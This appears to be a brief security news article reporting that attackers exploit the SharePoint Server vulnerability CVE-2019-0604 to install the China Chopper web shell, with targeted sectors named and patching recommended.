A web application security testing revealed that threat actors are actively exploiting a remote code execution vulnerability in some versions of SharePoint Server to install the hacking tool known as The China Copper. Although the vulnerability had already been patched, not all SharePoint deployments had been updated.
The vulnerability, tracked as CVE-2019-0604, affects all versions from SharePoint 2010 to SharePoint 2019; Microsoft corrected the flaw in February and released update patches in March and April.
“After the web application security testing, we discovered that a hacker trying to exploit this vulnerability could execute arbitrary code in the SharePoint application pool”, the specialists mentioned. According to reports, to exploit this vulnerability an attacker needs a specially designed SharePoint application package.
To exploit this vulnerability, threat actors used the hacking tool known as The China Chopper to remotely access compromised servers to send commands and manage files on victims’ servers.
The China Chopper allows hackers to upload and download any file on a compromised server, in addition to editing, deleting or renaming in any file, concluded the web application security testing.
The main objectives of the operators of this SharePoint vulnerability exploitation hacking campaign are public sector institutions, universities, in addition to the manufacturing and technology industries, say the specialists from the International Institute of Cyber Security (IICS).
Due to the lack of workarounds known to solve this security issue, specialists recommend system administrators to install the server update to prevent the exploitation of this vulnerability.
Microsoft announced that this year it will expand the scope and amounts granted to researchers through its vulnerability bounty program; this extension is expected to apply to services such as SharePoint, among other platforms developed by the company. Last year, Microsoft paid more than $2M USD to the cybersecurity community researchers for reporting several security flaws, some of them considered as critical.